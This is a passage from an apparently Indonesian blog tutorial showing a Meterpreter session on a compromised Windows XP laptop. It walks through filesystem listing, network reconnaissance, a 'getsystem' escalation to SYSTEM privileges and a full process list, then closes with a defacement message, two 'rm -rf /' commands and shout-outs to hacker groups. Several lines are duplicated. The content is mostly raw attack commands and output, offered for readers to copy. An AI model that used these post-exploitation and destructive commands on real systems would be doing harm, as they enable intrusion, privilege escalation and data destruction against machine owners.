1620 Camfrog Video Chat.exe x86 0 COMPAQ-056192EE\compaq C:\Program Files\Camfrog\Camfrog Video Chat\Camfrog Video Chat.exe
meterpreter >
C:\WINDOWS\system32
meterpreter > cd ..
meterpreter > pwd
C:\WINDOWS
meterpreter > cd ..
meterpreter > ls -la
[-] stdapi_fs_ls: Operation failed: The system cannot find the path specified.
meterpreter > ls (untuk melihat isi disk)
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 0 fil Fri May 07 19:43:57 +0700 2010 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil Fri May 07 19:43:57 +0700 2010 CONFIG.SYS
40777/rwxrwxrwx 0 dir Fri Nov 05 09:25:41 +0700 2010 Documents and Settings
100444/r--r--r-- 0 fil Fri May 07 19:43:57 +0700 2010 IO.SYS
40777/rwxrwxrwx 0 dir Fri May 07 19:51:24 +0700 2010 Intel
100444/r--r--r-- 0 fil Fri May 07 19:43:57 +0700 2010 MSDOS.SYS
40555/r-xr-xr-x 0 dir Sat May 08 11:38:42 +0700 2010 MSOCache
100555/r-xr-xr-x 47564 fil Wed Sep 01 06:00:00 +0700 2004 NTDETECT.COM
100666/rw-rw-rw- 13030 fil Fri Nov 05 21:16:08 +0700 2010 PDOXUSRS.NET
40555/r-xr-xr-x 0 dir Tue Feb 08 15:22:49 +0700 2011 Program Files
40777/rwxrwxrwx 0 dir Fri May 07 19:56:32 +0700 2010 RECYCLER
40777/rwxrwxrwx 0 dir Thu Nov 04 08:15:35 +0700 2010 SWSetup
40777/rwxrwxrwx 0 dir Fri May 07 19:48:06 +0700 2010 System Volume Information
40777/rwxrwxrwx 0 dir Sat Feb 05 23:15:05 +0700 2011 TransTool
40777/rwxrwxrwx 0 dir Tue Feb 08 15:49:30 +0700 2011 WINDOWS
40777/rwxrwxrwx 0 dir Sat May 08 11:22:33 +0700 2010 [Smad-Cage]
100666/rw-rw-rw- 211 fil Sat May 08 11:57:11 +0700 2010 boot.ini
40555/r-xr-xr-x 0 dir Tue Dec 21 12:46:52 +0700 2010 cwsandbox
100444/r--r--r-- 250032 fil Wed Sep 01 06:00:00 +0700 2004 ntldr
100666/rw-rw-rw- 2145386496 fil Mon Feb 14 20:52:46 +0700 2011 pagefile.sys
meterpreter >ipconfig (untuk meliat IP dari adapter)
Bluetooth LAN Access Server Driver - Packet Scheduler Miniport
Hardware MAC: 00:21:86:b2:8d:7e
IP Address : 0.0.0.0
Netmask : 0.0.0.0
Realtek RTL8169/8110 Family Gigabit Ethernet NIC - Packet Scheduler Miniport
Hardware MAC: 00:1e:ec:ec:6b:6a
IP Address : 0.0.0.0
Netmask : 0.0.0.0
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
Broadcom 802.11b/g WLAN - Packet Scheduler Miniport
Hardware MAC: 00:21:00:74:0e:cc
IP Address : 192.168.1.112 <- ini dya IPnya :))
Netmask : 255.255.255.0
meterpreter > route ( route dari si komputer )
Network routes
==============
Subnet Netmask Gateway
------ ------- -------
0.0.0.0 0.0.0.0 192.168.1.1
127.0.0.0 255.0.0.0 127.0.0.1
192.168.1.0 255.255.255.0 192.168.1.112
192.168.1.112 255.255.255.255 127.0.0.1
192.168.1.255 255.255.255.255 192.168.1.112
224.0.0.0 240.0.0.0 192.168.1.112
255.255.255.255 255.255.255.255 192.168.1.112
255.255.255.255 255.255.255.255 192.168.1.112
255.255.255.255 255.255.255.255 192.168.1.112
meterpreter > getsystem
...got system (via technique 1).
meterpreter > get
getdesktop getlwd getpid getprivs getsystem getuid getwd
meterpreter > getuid ( uid atau usermode )
Server username: NT AUTHORITY\SYSTEM
meterpreter > getpid
Current pid: 1308
meterpreter > ps ( melihat list program yang sedang jalan )
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0 NT AUTHORITY\SYSTEM
848 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
976 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
1000 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
1044 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
1056 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
1224 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1268 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1308 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1456 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1520 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1876 AvastSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
1992 explorer.exe x86 0 COMPAQ-056192EE\compaq C:\WINDOWS\Explorer.EXE
740 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1404 igfxtray.exe x86 0 COMPAQ-056192EE\compaq C:\WINDOWS\system32\igfxtray.exe
1412 hkcmd.exe x86 0 COMPAQ-056192EE\compaq C:\WINDOWS\system32\hkcmd.exe
1424 igfxpers.exe x86 0 COMPAQ-056192EE\compaq C:\WINDOWS\system32\igfxpers.exe
1552 igfxsrvc.exe x86 0 COMPAQ-056192EE\compaq C:\WINDOWS\system32\igfxsrvc.exe
1592 AvastUI.exe x86 0 COMPAQ-056192EE\compaq C:\PROGRA~1\ALWILS~1\Avast5\avastUI.exe
1672 SM?RTP.exe x86 0 COMPAQ-056192EE\compaq C:\Program Files\Smadav\SM?RTP.exe
1692 PDVDServ.exe x86 0 COMPAQ-056192EE\compaq C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
1728 realsched.exe x86 0 COMPAQ-056192EE\compaq C:\Program Files\Common Files\Real\Update_OB\realsched.exe
1812 sttray.exe x86 0 COMPAQ-056192EE\compaq C:\WINDOWS\sttray.exe
1164 IDMan.exe x86 0 COMPAQ-056192EE\compaq C:\Program Files\Internet Download Manager\IDMan.exe
2016 ctfmon.exe x86 0 COMPAQ-056192EE\compaq C:\WINDOWS\system32\ctfmon.exe
280 btwdins.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
288 BTTray.exe x86 0 COMPAQ-056192EE\compaq C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
400 RichVideo.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\CyberLink\Shared Files\RichVideo.exe
600 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
2156 BTSTAC~1.EXE x86 0 COMPAQ-056192EE\compaq C:\PROGRA~1\WIDCOMM\BLUETO~1\BTSTAC~1.EXE
2888 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
3256 IEMonitor.exe x86 0 COMPAQ-056192EE\compaq C:\Program Files\Internet Download Manager\IEMonitor.exe
1320 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
2772 chrome.exe x86 0 COMPAQ-056192EE\compaq C:\Documents and Settings\compaq\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
3056 chrome.exe x86 0 COMPAQ-056192EE\compaq C:\Documents and Settings\compaq\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
4032 firefox.exe x86 0 COMPAQ-056192EE\compaq C:\Program Files\Mozilla Firefox\firefox.exe
3976 chrome.exe x86 0 COMPAQ-056192EE\compaq C:\Documents and Settings\compaq\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
3048 chrome.exe x86 0 COMPAQ-056192EE\compaq C:\Documents and Settings\compaq\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
1620 Camfrog Video Chat.exe x86 0 COMPAQ-056192EE\compaq C:\Program Files\Camfrog\Camfrog Video Chat\Camfrog Video Chat.exe
meterpreter >
OK.
sekian dari beta, sampe sini aja tutor dari beta, selebihnya anda bisa exploire sendiri, beta mau jalan-jalan dulu di..di jendela ini, beta suka muter-muter....
sekian dari beta, sampe sini aja tutor dari beta, selebihnya anda bisa exploire sendiri, beta mau jalan-jalan dulu di..di jendela ini, beta suka muter-muter....
see you da ba bay.. :))
meterpreter > echo " mae a.K.a y3d0wn was here " > 0wn3d
[-] Unknown command: echo.
meterpreter > rm -rf /
[-] Unknown command: echo.
meterpreter > rm -rf /
Thanks to all.
hacker-newbie.org, devilzc0de.org, tecon-crew.org, PCT, dll.
1337db, ICA, PCA.
1337db, ICA, PCA.
special thanks to xnagacode, sidom, jurrank_dankkal, black*shadow, Mr.Hack.
and...andd you, yes... youuu.
and...andd you, yes... youuu.
{ 0 Comment... read them below or add one }
Post a Comment